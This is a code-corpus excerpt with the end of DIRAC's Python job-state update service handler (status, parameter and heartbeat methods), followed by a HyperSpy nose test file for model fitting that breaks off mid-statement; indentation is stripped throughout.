attrNames.append('Status')
attrValues.append(status)
if minor:
attrNames.append('MinorStatus')
attrValues.append(minor)
if application:
attrNames.append('ApplicationStatus')
attrValues.append(application)
if appCounter:
attrNames.append('ApplicationCounter')
attrValues.append(appCounter)
result = jobDB.setJobAttributes(jobID, attrNames, attrValues, update=True)
if not result['OK']:
return result
if endDate:
result = jobDB.setEndExecTime(jobID, endDate)
if startDate:
result = jobDB.setStartExecTime(jobID, startDate)
# Update the JobLoggingDB records
for date in dates:
sDict = statusDict[date]
status = sDict['Status']
if not status:
status = 'idem'
minor = sDict['MinorStatus']
if not minor:
minor = 'idem'
application = sDict['ApplicationStatus']
if not application:
application = 'idem'
source = sDict['Source']
result = logDB.addLoggingRecord(jobID, status, minor, application, date, source)
if not result['OK']:
return result
return S_OK()
###########################################################################
types_setJobSite = [[six.string_types, int], six.string_types]
def export_setJobSite(self, jobID, site):
"""Allows the site attribute to be set for a job specified by its jobID.
"""
result = jobDB.setJobAttribute(int(jobID), 'Site', site)
return result
###########################################################################
types_setJobFlag = [[six.string_types, int], six.string_types]
def export_setJobFlag(self, jobID, flag):
""" Set job flag for job with jobID
"""
result = jobDB.setJobAttribute(int(jobID), flag, 'True')
return result
###########################################################################
types_unsetJobFlag = [[six.string_types, int], six.string_types]
def export_unsetJobFlag(self, jobID, flag):
""" Unset job flag for job with jobID
"""
result = jobDB.setJobAttribute(int(jobID), flag, 'False')
return result
###########################################################################
types_setJobApplicationStatus = [[six.string_types, int], six.string_types, six.string_types]
def export_setJobApplicationStatus(self, jobID, appStatus, source='Unknown'):
""" Set the application status for job specified by its JobId.
"""
result = jobDB.getJobAttributes(int(jobID), ['Status', 'MinorStatus'])
if not result['OK']:
return result
if not result['Value']:
# if there is no matching Job it returns an empty dictionary
return S_ERROR('No Matching Job')
status = result['Value']['Status']
if status == "Stalled" or status == "Matched":
newStatus = 'Running'
else:
newStatus = status
minorStatus = result['Value']['MinorStatus']
result = jobDB.setJobStatus(int(jobID), status=newStatus, minor=minorStatus, application=appStatus)
if not result['OK']:
return result
result = logDB.addLoggingRecord(int(jobID), newStatus, minorStatus, appStatus, source=source)
return result
###########################################################################
types_setJobParameter = [[six.string_types, int], six.string_types, six.string_types]
def export_setJobParameter(self, jobID, name, value):
""" Set arbitrary parameter specified by name/value pair
for job specified by its JobId
"""
if elasticJobDB:
return elasticJobDB.setJobParameter(int(jobID), name, value)
return jobDB.setJobParameter(int(jobID), name, value)
###########################################################################
types_setJobsParameter = [dict]
def export_setJobsParameter(self, jobsParameterDict):
""" Set arbitrary parameter specified by name/value pair
for job specified by its JobId
"""
for jobID in jobsParameterDict:
if elasticJobDB:
res = elasticJobDB.setJobParameter(jobID,
str(jobsParameterDict[jobID][0]),
str(jobsParameterDict[jobID][1]))
if not res['OK']:
self.log.error('Failed to add Job Parameter to elasticJobDB', res['Message'])
else:
res = jobDB.setJobParameter(jobID,
str(jobsParameterDict[jobID][0]),
str(jobsParameterDict[jobID][1]))
if not res['OK']:
self.log.error('Failed to add Job Parameter to MySQL', res['Message'])
return S_OK()
###########################################################################
types_setJobParameters = [[six.string_types, int], list]
def export_setJobParameters(self, jobID, parameters):
""" Set arbitrary parameters specified by a list of name/value pairs
for job specified by its JobId
"""
result = jobDB.setJobParameters(int(jobID), parameters)
if not result['OK']:
return S_ERROR('Failed to store some of the parameters')
return S_OK('All parameters stored for job')
###########################################################################
types_sendHeartBeat = [[six.string_types, int], dict, dict]
def export_sendHeartBeat(self, jobID, dynamicData, staticData):
""" Send a heart beat sign of life for a job jobID
"""
result = jobDB.setHeartBeatData(int(jobID), staticData, dynamicData)
if not result['OK']:
self.log.warn('Failed to set the heart beat data', 'for job %d ' % int(jobID))
# Restore the Running status if necessary
result = jobDB.getJobAttributes(jobID, ['Status'])
if not result['OK']:
return result
if not result['Value']:
return S_ERROR('Job %d not found' % jobID)
status = result['Value']['Status']
if status == "Stalled" or status == "Matched":
result = jobDB.setJobAttribute(jobID, 'Status', 'Running', True)
if not result['OK']:
self.log.warn('Failed to restore the job status to Running')
jobMessageDict = {}
result = jobDB.getJobCommand(int(jobID))
if result['OK']:
jobMessageDict = result['Value']
if jobMessageDict:
for key, _value in jobMessageDict.items():
result = jobDB.setJobCommandStatus(int(jobID), key, 'Sent')
return S_OK(jobMessageDict)
| fstagni/DIRAC | WorkloadManagementSystem/Service/JobStateUpdateHandler.py | Python | gpl-3.0 | 13,370 | [
"DIRAC"
] | 61b3bd66857cb601a7a8c6a677691638e2c9315a136bbacabfc2ca4bb48b425c |
from distutils.version import StrictVersion
import numpy as np
import scipy
import nose.tools as nt
from unittest import mock
from nose.plugins.skip import SkipTest
import hyperspy.api as hs
from hyperspy.misc.utils import slugify
class TestModelJacobians:
def setUp(self):
s = hs.signals.Signal1D(np.zeros(1))
m = s.create_model()
self.low_loss = 7.
self.weights = 0.3
m.axis.axis = np.array([1, 0])
m.channel_switches = np.array([0, 1], dtype=bool)
m.append(hs.model.components1D.Gaussian())
m[0].A.value = 1
m[0].centre.value = 2.
m[0].sigma.twin = m[0].centre
m._low_loss = mock.MagicMock()
m.low_loss.return_value = self.low_loss
self.model = m
m.convolution_axis = np.zeros(2)
def test_jacobian_not_convolved(self):
m = self.model
m.convolved = False
jac = m._jacobian((1, 2, 3), None, weights=self.weights)
np.testing.assert_array_almost_equal(jac.squeeze(), self.weights *
np.array([m[0].A.grad(0),
m[0].sigma.grad(0) +
m[0].centre.grad(0)]))
nt.assert_equal(m[0].A.value, 1)
nt.assert_equal(m[0].centre.value, 2)
nt.assert_equal(m[0].sigma.value, 2)
def test_jacobian_convolved(self):
m = self.model
m.convolved = True
m.append(hs.model.components1D.Gaussian())
m[0].convolved = False
m[1].convolved = True
jac = m._jacobian((1, 2, 3, 4, 5), None, weights=self.weights)
np.testing.assert_array_almost_equal(jac.squeeze(), self.weights *
np.array([m[0].A.grad(0),
m[0].sigma.grad(0) +
m[0].centre.grad(0),
m[1].A.grad(0) *
self.low_loss,
m[1].centre.grad(0) *
self.low_loss,
m[1].sigma.grad(0) *
self.low_loss,
]))
nt.assert_equal(m[0].A.value, 1)
nt.assert_equal(m[0].centre.value, 2)
nt.assert_equal(m[0].sigma.value, 2)
nt.assert_equal(m[1].A.value, 3)
nt.assert_equal(m[1].centre.value, 4)
nt.assert_equal(m[1].sigma.value, 5)
class TestModelCallMethod:
def setUp(self):
s = hs.signals.Signal1D(np.empty(1))
m = s.create_model()
m.append(hs.model.components1D.Gaussian())
m.append(hs.model.components1D.Gaussian())
self.model = m
def test_call_method_no_convolutions(self):
m = self.model
m.convolved = False
m[1].active = False
r1 = m()
r2 = m(onlyactive=True)
np.testing.assert_almost_equal(m[0].function(0) * 2, r1)
np.testing.assert_almost_equal(m[0].function(0), r2)
m.convolved = True
r1 = m(non_convolved=True)
r2 = m(non_convolved=True, onlyactive=True)
np.testing.assert_almost_equal(m[0].function(0) * 2, r1)
np.testing.assert_almost_equal(m[0].function(0), r2)
def test_call_method_with_convolutions(self):
m = self.model
m._low_loss = mock.MagicMock()
m.low_loss.return_value = 0.3
m.convolved = True
m.append(hs.model.components1D.Gaussian())
m[1].active = False
m[0].convolved = True
m[1].convolved = False
m[2].convolved = False
m.convolution_axis = np.array([0., ])
r1 = m()
r2 = m(onlyactive=True)
np.testing.assert_almost_equal(m[0].function(0) * 2.3, r1)
np.testing.assert_almost_equal(m[0].function(0) * 1.3, r2)
def test_call_method_binned(self):
m = self.model
m.convolved = False
m.remove(1)
m.signal.metadata.Signal.binned = True
m.signal.axes_manager[-1].scale = 0.3
r1 = m()
np.testing.assert_almost_equal(m[0].function(0) * 0.3, r1)
class TestModelPlotCall:
def setUp(self):
s = hs.signals.Signal1D(np.empty(1))
m = s.create_model()
m.__call__ = mock.MagicMock()
m.__call__.return_value = np.array([0.5, 0.25])
m.axis = mock.MagicMock()
m.fetch_stored_values = mock.MagicMock()
m.channel_switches = np.array([0, 1, 1, 0, 0], dtype=bool)
self.model = m
def test_model2plot_own_am(self):
m = self.model
m.axis.axis.shape = (5,)
res = m._model2plot(m.axes_manager)
np.testing.assert_array_equal(
res, np.array([np.nan, 0.5, 0.25, np.nan, np.nan]))
nt.assert_true(m.__call__.called)
nt.assert_dict_equal(
m.__call__.call_args[1], {
'non_convolved': False, 'onlyactive': True})
nt.assert_false(m.fetch_stored_values.called)
def test_model2plot_other_am(self):
m = self.model
res = m._model2plot(m.axes_manager.deepcopy(), out_of_range2nans=False)
np.testing.assert_array_equal(res, np.array([0.5, 0.25]))
nt.assert_true(m.__call__.called)
nt.assert_dict_equal(
m.__call__.call_args[1], {
'non_convolved': False, 'onlyactive': True})
nt.assert_equal(2, m.fetch_stored_values.call_count)
class TestModelSettingPZero:
def setUp(self):
s = hs.signals.Signal1D(np.empty(1))
m = s.create_model()
m.append(hs.model.components1D.Gaussian())
m[0].A.value = 1.1
m[0].centre._number_of_elements = 2
m[0].centre.value = (2.2, 3.3)
m[0].sigma.value = 4.4
m[0].sigma.free = False
m[0].A._bounds = (0.1, 0.11)
m[0].centre._bounds = ((0.2, 0.21), (0.3, 0.31))
m[0].sigma._bounds = (0.4, 0.41)
self.model = m
def test_setting_p0(self):
m = self.model
m.append(hs.model.components1D.Gaussian())
m[-1].active = False
m.p0 = None
m._set_p0()
nt.assert_equal(m.p0, (1.1, 2.2, 3.3))
def test_fetching_from_p0(self):
m = self.model
m.append(hs.model.components1D.Gaussian())
m[-1].active = False
m[-1].A.value = 100
m[-1].sigma.value = 200
m[-1].centre.value = 300
m.p0 = (1.2, 2.3, 3.4, 5.6, 6.7, 7.8)
m._fetch_values_from_p0()
nt.assert_equal(m[0].A.value, 1.2)
nt.assert_equal(m[0].centre.value, (2.3, 3.4))
nt.assert_equal(m[0].sigma.value, 4.4)
nt.assert_equal(m[1].A.value, 100)
nt.assert_equal(m[1].sigma.value, 200)
nt.assert_equal(m[1].centre.value, 300)
def test_setting_boundaries(self):
m = self.model
m.append(hs.model.components1D.Gaussian())
m[-1].active = False
m.set_boundaries()
nt.assert_equal(m.free_parameters_boundaries,
[(0.1, 0.11), (0.2, 0.21), (0.3, 0.31)])
def test_setting_mpfit_parameters_info(self):
m = self.model
m[0].A.bmax = None
m[0].centre.bmin = None
m[0].centre.bmax = 0.31
m.append(hs.model.components1D.Gaussian())
m[-1].active = False
m.set_mpfit_parameters_info()
nt.assert_equal(m.mpfit_parinfo,
[{'limited': [True, False],
'limits': [0.1, 0]},
{'limited': [False, True],
'limits': [0, 0.31]},
{'limited': [False, True],
'limits': [0, 0.31]},
])
class TestModel1D:
def setUp(self):
s = hs.signals.Signal1D(np.empty(1))
m = s.create_model()
self.model = m
def test_errfunc(self):
m = self.model
m._model_function = mock.MagicMock()
m._model_function.return_value = 3.
np.testing.assert_equal(m._errfunc(None, 1., None), 2.)
np.testing.assert_equal(m._errfunc(None, 1., 0.3), 0.6)
def test_errfunc2(self):
m = self.model
m._model_function = mock.MagicMock()
m._model_function.return_value = 3. * np.ones(2)
np.testing.assert_equal(m._errfunc2(None, np.ones(2), None), 2 * 4.)
np.testing.assert_equal(m._errfunc2(None, np.ones(2), 0.3), 2 * 0.36)
def test_gradient_ls(self):
m = self.model
m._errfunc = mock.MagicMock()
m._errfunc.return_value = 0.1
m._jacobian = mock.MagicMock()
m._jacobian.return_value = np.ones((1, 2)) * 7.
np.testing.assert_equal(m._gradient_ls(None, None), 2 * 0.1 * 7 * 2)
def test_gradient_ml(self):
m = self.model
m._model_function = mock.MagicMock()
m._model_function.return_value = 3. * np.ones(2)
m._jacobian = mock.MagicMock()
m._jacobian.return_value = np.ones((1, 2)) * 7.
np.testing.assert_equal(
m._gradient_ml(None, 1.2), -2 * 7 * (1.2 / 3 - 1))
def test_model_function(self):
m = self.model
m.append(hs.model.components1D.Gaussian())
m[0].A.value = 1.3
m[0].centre.value = 0.003
m[0].sigma.value = 0.1
param = (100, 0.1, 0.2)
np.testing.assert_array_almost_equal(176.03266338,
m._model_function(param))
nt.assert_equal(m[0].A.value, 100)
nt.assert_equal(m[0].centre.value, 0.1)
nt.assert_equal(m[0].sigma.value, 0.2)
@nt.raises(ValueError)
def test_append_existing_component(self):
g = hs.model.components1D.Gaussian()
m = self.model
m.append(g)
m.append(g)
def test_append_component(self):
g = hs.model.components1D.Gaussian()
m = self.model
m.append(g)
nt.assert_in(g, m)
nt.assert_is(g.model, m)
nt.assert_is(g._axes_manager, m.axes_manager)
nt.assert_true(all([hasattr(p, 'map') for p in g.parameters]))
def test_calculating_convolution_axis(self):
m = self.model
# setup
m.axis.offset = 10
m.axis.size = 10
ll_axis = mock.MagicMock()
ll_axis.size = 7
ll_axis.value2index.return_value = 3
m._low_loss = mock.MagicMock()
m.low_loss.axes_manager.signal_axes = [ll_axis, ]
# calculation
m.set_convolution_axis()
# tests
np.testing.assert_array_equal(m.convolution_axis, np.arange(7, 23))
np.testing.assert_equal(ll_axis.value2index.call_args[0][0], 0)
def test_notebook_interactions(self):
try:
import ipywidgets
except:
raise SkipTest("ipywidgets not installed")
if StrictVersion(ipywidgets.__version__) < StrictVersion("5.0"):
raise SkipTest("ipywigets > 5.0 required but %s installed" %
ipywidgets.__version__)
m = self.model
m.notebook_interaction()
m.append(hs.model.components1D.Offset())
m[0].notebook_interaction()
m[0].offset.notebook_interaction()
def test_access_component_by_name(self):
m = self.model
g1 = hs.model.components1D.Gaussian()
g2 = hs.model.components1D.Gaussian()
g2.name = "test"
m.extend((g1, g2))
nt.assert_is(m["test"], g2)
def test_access_component_by_index(self):
m = self.model
g1 = hs.model.components1D.Gaussian()
g2 = hs.model.components1D.Gaussian()
g2.name = "test"
m.extend((g1, g2))
nt.assert_is(m[1], g2)
def test_component_name_when_append(self):
m = self.model
gs = [
hs.model.components1D.Gaussian(),
hs.model.components1D.Gaussian(),
hs.model.components1D.Gaussian()]
m.extend(gs)
nt.assert_is(m['Gaussian'], gs[0])
nt.assert_is(m['Gaussian_0'], gs[1])
nt.assert_is(m['Gaussian_1'], gs[2])
@nt.raises(ValueError)
def test_several_component_with_same_name(self):
m = self.model
gs = [
hs.model.components1D.Gaussian(),
hs.model.components1D.Gaussian(),
hs.model.components1D.Gaussian()]
m.extend(gs)
m[0]._name = "hs.model.components1D.Gaussian"
m[1]._name = "hs.model.components1D.Gaussian"
m[2]._name = "hs.model.components1D.Gaussian"
m['Gaussian']
@nt.raises(ValueError)
def test_no_component_with_that_name(self):
m = self.model
m['Voigt']
@nt.raises(ValueError)
def test_component_already_in_model(self):
m = self.model
g1 = hs.model.components1D.Gaussian()
m.extend((g1, g1))
def test_remove_component(self):
m = self.model
g1 = hs.model.components1D.Gaussian()
m.append(g1)
m.remove(g1)
nt.assert_equal(len(m), 0)
def test_remove_component_by_index(self):
m = self.model
g1 = hs.model.components1D.Gaussian()
m.append(g1)
m.remove(0)
nt.assert_equal(len(m), 0)
def test_remove_component_by_name(self):
m = self.model
g1 = hs.model.components1D.Gaussian()
m.append(g1)
m.remove(g1.name)
nt.assert_equal(len(m), 0)
def test_delete_component_by_index(self):
m = self.model
g1 = hs.model.components1D.Gaussian()
m.append(g1)
del m[0]
nt.assert_not_in(g1, m)
def test_delete_component_by_name(self):
m = self.model
g1 = hs.model.components1D.Gaussian()
m.append(g1)
del m[g1.name]
nt.assert_not_in(g1, m)
def test_delete_slice(self):
m = self.model
g1 = hs.model.components1D.Gaussian()
g2 = hs.model.components1D.Gaussian()
g3 = hs.model.components1D.Gaussian()
m.extend([g1, g2, g3])
del m[:2]
nt.assert_not_in(g1, m)
nt.assert_not_in(g2, m)
nt.assert_in(g3, m)
def test_get_component_by_name(self):
m = self.model
g1 = hs.model.components1D.Gaussian()
g2 = hs.model.components1D.Gaussian()
g2.name = "test"
m.extend((g1, g2))
nt.assert_is(m._get_component("test"), g2)
def test_get_component_by_index(self):
m = self.model
g1 = hs.model.components1D.Gaussian()
g2 = hs.model.components1D.Gaussian()
g2.name = "test"
m.extend((g1, g2))
nt.assert_is(m._get_component(1), g2)
def test_get_component_by_component(self):
m = self.model
g1 = hs.model.components1D.Gaussian()
g2 = hs.model.components1D.Gaussian()
g2.name = "test"
m.extend((g1, g2))
nt.assert_is(m._get_component(g2), g2)
@nt.raises(ValueError)
def test_get_component_wrong(self):
m = self.model
g1 = hs.model.components1D.Gaussian()
g2 = hs.model.components1D.Gaussian()
g2.name = "test"
m.extend((g1, g2))
m._get_component(1.2)
def test_components_class_default(self):
m = self.model
g1 = hs.model.components1D.Gaussian()
m.append(g1)
nt.assert_is(getattr(m.components, g1.name), g1)
def test_components_class_change_name(self):
m = self.model
g1 = hs.model.components1D.Gaussian()
m.append(g1)
g1.name = "test"
nt.assert_is(getattr(m.components, g1.name), g1)
@nt.raises(AttributeError)
def test_components_class_change_name_del_default(self):
m = self.model
g1 = hs.model.components1D.Gaussian()
m.append(g1)
g1.name = "test"
getattr(m.components, "Gaussian")
def test_components_class_change_invalid_name(self):
m = self.model
g1 = hs.model.components1D.Gaussian()
m.append(g1)
g1.name = "1, Test This!"
nt.assert_is(
getattr(m.components,
slugify(g1.name, valid_variable_name=True)), g1)
@nt.raises(AttributeError)
def test_components_class_change_name_del_default(self):
m = self.model
g1 = hs.model.components1D.Gaussian()
m.append(g1)
invalid_name = "1, Test This!"
g1.name = invalid_name
g1.name = "test"
getattr(m.components, slugify(invalid_name))
def test_snap_parameter_bounds(self):
m = self.model
g1 = hs.model.components1D.Gaussian()
m.append(g1)
g2 = hs.model.components1D.Gaussian()
m.append(g2)
g3 = hs.model.components1D.Gaussian()
m.append(g3)
g4 = hs.model.components1D.Gaussian()
m.append(g4)
p = hs.model.components1D.Polynomial(3)
m.append(p)
g1.A.value = 3.
g1.centre.bmin = 300.
g1.centre.value = 1.
g1.sigma.bmax = 15.
g1.sigma.value = 30
g2.A.value = 1
g2.A.bmin = 0.
g2.A.bmax = 3.
g2.centre.value = 0
g2.centre.bmin = 1
g2.centre.bmax = 3.
g2.sigma.value = 4
g2.sigma.bmin = 1
g2.sigma.bmax = 3.
g3.A.bmin = 0
g3.A.value = -3
g3.A.free = False
g3.centre.value = 15
g3.centre.bmax = 10
g3.centre.free = False
g3.sigma.value = 1
g3.sigma.bmin = 0
g3.sigma.bmax = 0
g4.active = False
g4.A.value = 300
g4.A.bmin = 500
g4.centre.value = 0
g4.centre.bmax = -1
g4.sigma.value = 1
g4.sigma.bmin = 10
p.coefficients.value = (1, 2, 3, 4)
p.coefficients.bmin = 2
p.coefficients.bmax = 3
m.ensure_parameters_in_bounds()
np.testing.assert_almost_equal(g1.A.value, 3.)
np.testing.assert_almost_equal(g2.A.value, 1.)
np.testing.assert_almost_equal(g3.A.value, -3.)
np.testing.assert_almost_equal(g4.A.value, 300.)
np.testing.assert_almost_equal(g1.centre.value, 300.)
np.testing.assert_almost_equal(g2.centre.value, 1.)
np.testing.assert_almost_equal(g3.centre.value, 15.)
np.testing.assert_almost_equal(g4.centre.value, 0)
np.testing.assert_almost_equal(g1.sigma.value, 15.)
np.testing.assert_almost_equal(g2.sigma.value, 3.)
np.testing.assert_almost_equal(g3.sigma.value, 0.)
np.testing.assert_almost_equal(g4.sigma.value, 1)
np.testing.assert_almost_equal(p.coefficients.value, (2, 2, 3, 3))
class TestModel2D:
def setUp(self):
g = hs.model.components2D.Gaussian2D(
centre_x=-5.,
centre_y=-5.,
sigma_x=1.,
sigma_y=2.)
x = np.arange(-10, 10, 0.01)
y = np.arange(-10, 10, 0.01)
X, Y = np.meshgrid(x, y)
im = hs.signals.Signal2D(g.function(X, Y))
im.axes_manager[0].scale = 0.01
im.axes_manager[0].offset = -10
im.axes_manager[1].scale = 0.01
im.axes_manager[1].offset = -10
self.im = im
def test_fitting(self):
im = self.im
m = im.create_model()
gt = hs.model.components2D.Gaussian2D(centre_x=-4.5,
centre_y=-4.5,
sigma_x=0.5,
sigma_y=1.5)
m.append(gt)
m.fit()
np.testing.assert_almost_equal(gt.centre_x.value, -5.)
np.testing.assert_almost_equal(gt.centre_y.value, -5.)
np.testing.assert_almost_equal(gt.sigma_x.value, 1.)
np.testing.assert_almost_equal(gt.sigma_y.value, 2.)
class TestModelFitBinned:
def setUp(self):
np.random.seed(1)
s = hs.signals.Signal1D(
np.random.normal(
scale=2,
size=10000)).get_histogram()
s.metadata.Signal.binned = True
g = hs.model.components1D.Gaussian()
m = s.create_model()
m.append(g)
g.sigma.value = 1
g.centre.value = 0.5
g.A.value = 1e3
self.m = m
def test_fit_neldermead_leastsq(self):
self.m.fit(fitter="Nelder-Mead", method="ls")
np.testing.assert_almost_equal(self.m[0].A.value, 9976.14519369)
np.testing.assert_almost_equal(self.m[0].centre.value, -0.110610743285)
np.testing.assert_almost_equal(self.m[0].sigma.value, 1.98380705455)
def test_fit_neldermead_ml(self):
self.m.fit(fitter="Nelder-Mead", method="ml")
np.testing.assert_almost_equal(self.m[0].A.value, 10001.39613936,
decimal=3)
np.testing.assert_almost_equal(self.m[0].centre.value, -0.104151206314,
decimal=6)
np.testing.assert_almost_equal(self.m[0].sigma.value, 2.00053642434)
def test_fit_leastsq(self):
self.m.fit(fitter="leastsq")
np.testing.assert_almost_equal(self.m[0].A.value, 9976.14526082, 1)
np.testing.assert_almost_equal(self.m[0].centre.value, -0.110610727064)
np.testing.assert_almost_equal(self.m[0].sigma.value, 1.98380707571, 5)
def test_fit_mpfit(self):
self.m.fit(fitter="mpfit")
np.testing.assert_almost_equal(self.m[0].A.value, 9976.14526286, 5)
np.testing.assert_almost_equal(self.m[0].centre.value, -0.110610718444)
np.testing.assert_almost_equal(self.m[0].sigma.value, 1.98380707614)
def test_fit_odr(self):
self.m.fit(fitter="odr")
np.testing.assert_almost_equal(self.m[0].A.value, 9976.14531979, 3)
np.testing.assert_almost_equal(self.m[0].centre.value, -0.110610724054)
np.testing.assert_almost_equal(self.m[0].sigma.value, 1.98380709939)
def test_fit_leastsq_grad(self):
self.m.fit(fitter="leastsq", grad=True)
np.testing.assert_almost_equal(self.m[0].A.value, 9976.14526084)
np.testing.assert_almost_equal(self.m[0].centre.value, -0.11061073306)
np.testing.assert_almost_equal(self.m[0].sigma.value, 1.98380707552)
def test_fit_mpfit_grad(self):
self.m.fit(fitter="mpfit", grad=True)
np.testing.assert_almost_equal(self.m[0].A.value, 9976.14526084)
np.testing.assert_almost_equal(self.m[0].centre.value, -0.11061073306)
np.testing.assert_almost_equal(self.m[0].sigma.value, 1.98380707552)
def test_fit_odr_grad(self):
self.m.fit(fitter="odr", grad=True)
np.testing.assert_almost_equal(self.m[0].A.value, 9976.14531979, 3)
np.testing.assert_almost_equal(self.m[0].centre.value, -0.110610724054)
np.testing.assert_almost_equal(self.m[0].sigma.value, 1.98380709939)
def test_fit_bounded_mpfit(self):
self.m[0].centre.bmin = 0.5
# self.m[0].bounded = True
self.m.fit(fitter="mpfit", bounded=True)
np.testing.assert_almost_equal(self.m[0].A.value, 9991.65422046, 4)
np.testing.assert_almost_equal(self.m[0].centre.value, 0.5)
np.testing.assert_almost_equal(self.m[0].sigma.value, 2.08398236966)
def test_fit_bounded_leastsq(self):
if StrictVersion(scipy.__version__) < StrictVersion("0.17"):
raise SkipTest("least bounds only available in scipy >= 0.17")
self.m[0].centre.bmin = 0.5
# self.m[0].bounded = True
self.m.fit(fitter="leastsq", bounded=True)
np.testing.assert_almost_equal(self.m[0].A.value, 9991.65422046, 3)
np.testing.assert_almost_equal(self.m[0].centre.value, 0.5)
np.testing.assert_almost_equal(self.m[0].sigma.value, 2.08398236966)
def test_fit_bounded_lbfgs(self):
self.m[0].centre.bmin = 0.5
# self.m[0].bounded = True
self.m.fit(fitter="L-BFGS-B", bounded=True, grad=True)
np.testing.assert_almost_equal(self.m[0].A.value, 9991.65422046, 4)
np.testing.assert_almost_equal(self.m[0].centre.value, 0.5)
np.testing.assert_almost_equal(self.m[0].sigma.value, 2.08398236966)
def test_fit_bounded_bad_starting_values_mpfit(self):
self.m[0].centre.bmin = 0.5
self.m[0].centre.value = -1
# self.m[0].bounded = True
self.m.fit(fitter="mpfit", bounded=True)
np.testing.assert_almost_equal(self.m[0].A.value, 9991.65422046, 4)
np.testing.assert_almost_equal(self.m[0].centre.value, 0.5)
np.testing.assert_almost_equal(self.m[0].sigma.value, 2.08398236966)
def test_fit_bounded_bad_starting_values_leastsq(self):
self.m[0].centre.bmin = 0.5
self.m[0].centre.value = -1
# self.m[0].bounded = True
self.m.fit(fitter="leastsq", bounded=True)
np.testing.assert_almost_equal(self.m[0].A.value, 9991.65422046, 3)
np.testing.assert_almost_equal(self.m[0].centre.value, 0.5)
np.testing.assert_almost_equal(self.m[0].sigma.value, 2.08398236966)
def test_fit_bounded_bad_starting_values_lbfgs(self):
self.m[0].centre.bmin = 0.5
self.m[0].centre.value = -1
# self.m[0].bounded = True
self.m.fit(fitter="L-BFGS-B", bounded=True, grad=True)
np.testing.assert_almost_equal(self.m[0].A.value, 9991.65422046, 4)
np.testing.assert_almost_equal(self.m[0].centre.value, 0.5)
np.testing.assert_almost_equal(self.m[0].sigma.value, 2.08398236966)
@nt.raises(ValueError)
def test_wrong_method(self):
self.m.fit(method="dummy")
class TestModelWeighted:
def setUp(self):
np.random.seed(1)
s = hs.signals.Signal1D(np.arange(10, 100, 0.1))
s.metadata.set_item("Signal.Noise_properties.variance",
hs.signals.Signal1D(np.arange(10, 100, 0.01)))
s.axes_manager[0].scale = 0.1
s.axes_manager[0].offset = 10
s.add_poissonian_noise()
m = s.create_model()
m.append(hs.model.components1D.Polynomial(1))
self.m = m
def test_fit_leastsq_binned(self):
self.m.signal.metadata.Signal.binned = True
self.m.fit(fitter="leastsq", method="ls")
for result, expected in zip(self.m[0].coefficients.value,
(9.9165596693502778, 1.6628238107916631)):
np.testing.assert_almost_equal(result, expected, decimal=5)
def test_fit_odr_binned(self):
self.m.signal.metadata.Signal.binned = True
self.m.fit(fitter="odr", method="ls")
for result, expected in zip(self.m[0].coefficients.value,
(9.9165596548961972, 1.6628247412317521)):
np.testing.assert_almost_equal(result, expected, decimal=5)
def test_fit_mpfit_binned(self):
self.m.signal.metadata.Signal.binned = True
self.m.fit(fitter="mpfit", method="ls")
for result, expected in zip(self.m[0].coefficients.value,
(9.9165596607108739, 1.6628243846485873)):
np.testing.assert_almost_equal(result, expected, decimal=5)
def test_fit_neldermead_binned(self):
self.m.signal.metadata.Signal.binned = True
self.m.fit(
fitter="Nelder-Mead",
method="ls",
)
for result, expected in zip(self.m[0].coefficients.value,
(9.9137288425667442, 1.8446013472266145)):
np.testing.assert_almost_equal(result, expected, decimal=5)
def test_fit_leastsq_unbinned(self):
self.m.signal.metadata.Signal.binned = False
self.m.fit(fitter="leastsq", method="ls")
for result, expected in zip(
self.m[0].coefficients.value,
(0.99165596391487121, 0.16628254242532492)):
np.testing.assert_almost_equal(result, expected, decimal=5)
def test_fit_odr_unbinned(self):
self.m.signal.metadata.Signal.binned = False
self.m.fit(fitter="odr", method="ls")
for result, expected in zip(
self.m[0].coefficients.value,
(0.99165596548961943, 0.16628247412317315)):
np.testing.assert_almost_equal(result, expected, decimal=5)
def test_fit_mpfit_unbinned(self):
self.m.signal.metadata.Signal.binned = False
self.m.fit(fitter="mpfit", method="ls")
for result, expected in zip(
self.m[0].coefficients.value,
(0.99165596295068958, 0.16628257462820528)):
np.testing.assert_almost_equal(result, expected, decimal=5)
def test_fit_neldermead_unbinned(self):
self.m.signal.metadata.Signal.binned = False
self.m.fit(
fitter="Nelder-Mead",
method="ls",
)
for result, expected in zip(
self.m[0].coefficients.value,
(0.99136169230026261, 0.18483060534056939)):
np.testing.assert_almost_equal(result, expected, decimal=5)
def test_chisq(self):
self.m.signal.metadata.Signal.binned = True
self.m.fit(fitter="leastsq", method="ls")
np.testing.assert_almost_equal(self.m.chisq.data, 3029.16949561)
def test_red_chisq(self):
self.m.fit(fitter="leastsq", method="ls")
np.testing.assert_almost_equal(self.m.red_chisq.data, 3.37700055)
class TestModelScalarVariance:
def setUp(self):
s = hs.signals.Signal1D(np.ones(100))
m = s.create_model()
m.append(hs.model.components1D.Offset())
self.s = s
self.m = m
def test_std1_chisq(self):
std = 1
np.random.seed(1)
self.s.add_gaussian_noise(std)
self.s.metadata.set_item("Signal.Noise_properties.variance", std ** 2)
self.m.fit(fitter="leastsq", method="ls")
np.testing.assert_almost_equal(self.m.chisq.data, 78.35015229)
def test_std10_chisq(self):
std = 10
np.random.seed(1)
self.s.add_gaussian_noise(std)
self.s.metadata.set_item("Signal.Noise_properties.variance", std ** 2)
self.m.fit(fitter="leastsq", method="ls")
np.testing.assert_almost_equal(self.m.chisq.data, 78.35015229)
def test_std1_red_chisq(self):
std = 1
np.random.seed(1)
self.s.add_gaussian_noise(std)
self.s.metadata.set_item("Signal.Noise_properties.variance", std ** 2)
self.m.fit(fitter="leastsq", method="ls")
np.testing.assert_almost_equal(self.m.red_chisq.data, 0.79949135)
def test_std10_red_chisq(self):
std = 10
np.random.seed(1)
self.s.add_gaussian_noise(std)
self.s.metadata.set_item("Signal.Noise_properties.variance", std ** 2)
self.m.fit(fitter="leastsq", method="ls")
np.testing.assert_almost_equal(self.m.red_chisq.data, 0.79949135)
def test_std1_red_chisq_in_range(self):
std = 1
self.m.set_signal_range(10, 50)
np.random.seed(1)
self.s.add_gaussian_noise(std)
self.s.metadata.set_item("Signal.Noise_properties.variance", std ** 2)
self.m.fit(fitter="leastsq", method="ls")
np.testing.assert_almost_equal(self.m.red_chisq.data, 0.86206965)
class TestModelSignalVariance:
def setUp(self):
variance = hs.signals.Signal1D(np.arange(100, 300).reshape(
(2, 100)))
s = variance.deepcopy()
np.random.seed(1)
std = 10
s.add_gaussian_noise(std)
s.add_poissonian_noise()
s.metadata.set_item("Signal.Noise_properties.variance",
